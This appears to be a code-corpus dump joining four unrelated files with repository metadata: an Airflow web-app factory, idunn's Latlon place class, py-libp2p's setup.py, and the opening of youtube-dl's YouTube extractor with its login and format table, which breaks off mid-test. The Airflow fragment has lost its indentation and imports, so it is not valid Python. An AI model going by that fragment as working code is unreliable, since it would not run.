from airflow.www.blueprints import routes
from airflow.logging_config import configure_logging
from airflow import jobs
from airflow import settings
from airflow import configuration
def create_app(config=None, testing=False):
app = Flask(__name__)
app.secret_key = configuration.get('webserver', 'SECRET_KEY')
app.config['LOGIN_DISABLED'] = not configuration.getboolean('webserver', 'AUTHENTICATE')
csrf.init_app(app)
app.config['TESTING'] = testing
airflow.load_login()
airflow.login.login_manager.init_app(app)
from airflow import api
api.load_auth()
api.api_auth.init_app(app)
cache = Cache(
app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})
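    # Cache(app=..., config=...) calls init_app() internally, so the local name is not used again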
app.register_blueprint(routes)
configure_logging()
with app.app_context():
from airflow.www import views
admin = Admin(
app, name='Airflow',
static_url_path='/admin',
index_view=views.HomeView(endpoint='', url='/admin', name="DAGs"),
template_mode='bootstrap3',
)
av = admin.add_view
vs = views
av(vs.Airflow(name='DAGs', category='DAGs'))
if not conf.getboolean('core', 'secure_mode'):
av(vs.QueryView(name='Ad Hoc Query', category="Data Profiling"))
av(vs.ChartModelView(
models.Chart, Session, name="Charts", category="Data Profiling"))
av(vs.KnownEventView(
models.KnownEvent,
Session, name="Known Events", category="Data Profiling"))
av(vs.SlaMissModelView(
models.SlaMiss,
Session, name="SLA Misses", category="Browse"))
av(vs.TaskInstanceModelView(models.TaskInstance,
Session, name="Task Instances", category="Browse"))
av(vs.LogModelView(
models.Log, Session, name="Logs", category="Browse"))
av(vs.JobModelView(
jobs.BaseJob, Session, name="Jobs", category="Browse"))
av(vs.PoolModelView(
models.Pool, Session, name="Pools", category="Admin"))
av(vs.ConfigurationView(
name='Configuration', category="Admin"))
av(vs.UserModelView(
models.User, Session, name="Users", category="Admin"))
av(vs.ConnectionModelView(
models.Connection, Session, name="Connections", category="Admin"))
av(vs.VariableView(
models.Variable, Session, name="Variables", category="Admin"))
av(vs.XComView(
models.XCom, Session, name="XComs", category="Admin"))
admin.add_link(base.MenuLink(
category='Docs', name='Documentation',
url='http://pythonhosted.org/airflow/'))
admin.add_link(
base.MenuLink(category='Docs',
                          name='Github', url='https://github.com/apache/incubator-airflow'))
av(vs.VersionView(name='Version', category="About"))
av(vs.DagRunModelView(
models.DagRun, Session, name="DAG Runs", category="Browse"))
av(vs.DagModelView(models.DagModel, Session, name=None))
# Hack to not add this view to the menu
admin._menu = admin._menu[:-1]
def integrate_plugins():
"""Integrate plugins to the context"""
log = LoggingMixin().log
from airflow.plugins_manager import (
admin_views, flask_blueprints, menu_links)
for v in admin_views:
log.debug('Adding view %s', v.name)
admin.add_view(v)
for bp in flask_blueprints:
log.debug('Adding blueprint %s', bp.name)
app.register_blueprint(bp)
for ml in sorted(menu_links, key=lambda x: x.name):
log.debug('Adding menu link %s', ml.name)
admin.add_link(ml)
integrate_plugins()
import airflow.www.api.experimental.endpoints as e
# required for testing purposes otherwise the module retains
# a link to the default_auth
if app.config['TESTING']:
if six.PY2:
reload(e)
else:
import importlib
importlib.reload(e)
app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')
@app.context_processor
def jinja_globals():
return {
'hostname': socket.getfqdn(),
}
@app.teardown_appcontext
def shutdown_session(exception=None):
settings.Session.remove()
return app
app = None
def cached_app(config=None):
global app
if not app:
app = create_app(config)
return app
| 33.733333
| 92
| 0.630075
|
ed1575d3ea4c589e9f88f13a54e9cba41725f6dd
| 1,068
|
py
|
Python
|
idunn/places/latlon.py
|
QwantResearch/idunn
|
88b6862f1036187855b5541bbb6758ddd4df33c1
|
[
"Apache-2.0"
] | 26
|
2018-11-30T09:17:17.000Z
|
2020-11-07T01:53:07.000Z
|
idunn/places/latlon.py
|
QwantResearch/idunn
|
88b6862f1036187855b5541bbb6758ddd4df33c1
|
[
"Apache-2.0"
] | 38
|
2018-06-08T09:41:04.000Z
|
2020-12-07T17:39:12.000Z
|
idunn/places/latlon.py
|
Qwant/idunn
|
65582dfed732093778bf7c2998db1e2cd78255b8
|
[
"Apache-2.0"
] | 9
|
2018-05-18T13:07:00.000Z
|
2020-08-01T16:42:40.000Z
|
from .address import Address
from .base import BasePlace
from .exceptions import InvalidPlaceId
class Latlon(BasePlace):
PLACE_TYPE = "latlon"
PLACE_ID_NAMESPACE = "latlon"
def __init__(self, lat, lon, closest_address=None):
self.lat = round(float(lat), 5)
self.lon = round(float(lon), 5)
self.closest_address = closest_address or Address({})
super().__init__(self.closest_address)
@classmethod
def from_id(cls, latlon_id):
try:
_namespace, lat, lon = latlon_id.split(":")
except ValueError as exc:
raise InvalidPlaceId(latlon_id) from exc
return cls(lat, lon)
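        # e.g. Latlon.from_id("latlon:48.85661:2.35222") -> Latlon(48.85661, 2.35222) (illustrative coordinates)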
def build_address(self, lang):
if self.closest_address:
return self.closest_address.build_address(lang)
return None
def get_id(self):
return f"{self.PLACE_ID_NAMESPACE}:{self.lat:.5f}:{self.lon:.5f}"
def get_local_name(self):
return f"{self.lat:.5f} : {self.lon:.5f}"
def get_coord(self):
return {"lat": self.lat, "lon": self.lon}
| 28.864865
| 73
| 0.636704
|
fd66fc8c80495c9c32d43febf25a087c071fcd40
| 2,040
|
py
|
Python
|
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | 2
|
2020-10-13T07:43:55.000Z
|
2020-10-27T08:51:53.000Z
|
import setuptools
py_classifiers = [f"Programming Language :: Python :: {version}" for version in ["3.7"]]
extras_require = {
"test": [
"factory-boy>=2.12.0,<3.0.0",
"pytest>=4.6.3,<5.0.0",
"pytest-asyncio>=0.10.0,<1.0.0",
"pytest-xdist>=1.30.0",
],
"lint": [
"mypy>=0.701,<1.0",
"mypy-protobuf==1.15",
"black==19.3b0",
"isort==4.3.21",
"flake8>=3.7.7,<4.0.0",
"flake8-bugbear",
],
"dev": [
"bumpversion>=0.5.3,<1",
"docformatter",
"setuptools>=36.2.0",
"tox>=3.13.2,<4.0.0",
"twine",
"wheel",
],
}
extras_require["dev"] = (
extras_require["test"] + extras_require["lint"] + extras_require["dev"]
)
with open("./README.md") as readme:
long_description = readme.read()
setuptools.setup(
name="libp2p",
description="libp2p implementation written in python",
version="0.1.2",
long_description=long_description,
long_description_content_type="text/markdown",
maintainer="The Ethereum Foundation",
maintainer_email="snakecharmers@ethereum.org",
url="https://github.com/ethereum/py-libp2p",
license="MIT/APACHE2.0",
platforms=["unix", "linux", "osx"],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
]
+ py_classifiers,
python_requires=">=3.7,<4",
install_requires=[
"pycryptodome>=3.9.2,<4.0.0",
"base58==2.0.1",
"pymultihash>=0.8.2",
"multiaddr>=0.0.8,<0.1.0",
"rpcudp>=3.0.0,<4.0.0",
"lru-dict>=1.1.6",
"protobuf>=3.10.0,<4.0.0",
"coincurve",
"fastecdsa",
"pynacl==1.3.0",
],
extras_require=extras_require,
packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
zip_safe=False,
keywords="libp2p p2p",
)
| 26.493506
| 88
| 0.556373
|
132572c88cf26b5d0d2fa3efc33aa290b3140755
| 137,527
|
py
|
Python
|
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_or_none,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
url_or_none,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
query = kwargs.get('query', {}).copy()
query['disable_polymer'] = 'true'
kwargs['query'] = query
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
            # The link with index 0 is not the first video of the playlist (not sure if this is still the case)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
(?:(?:www|dev)\.)?invidio\.us/|
(?:www\.)?invidiou\.sh/|
(?:www\.)?invidious\.snopyta\.org/|
(?:www\.)?invidious\.kabi\.tk/|
(?:www\.)?vid\.wxzm\.sx/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/ytdl-org/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('srv1', 'srv2', 'srv3', 'ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact phihag@phihag.de .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
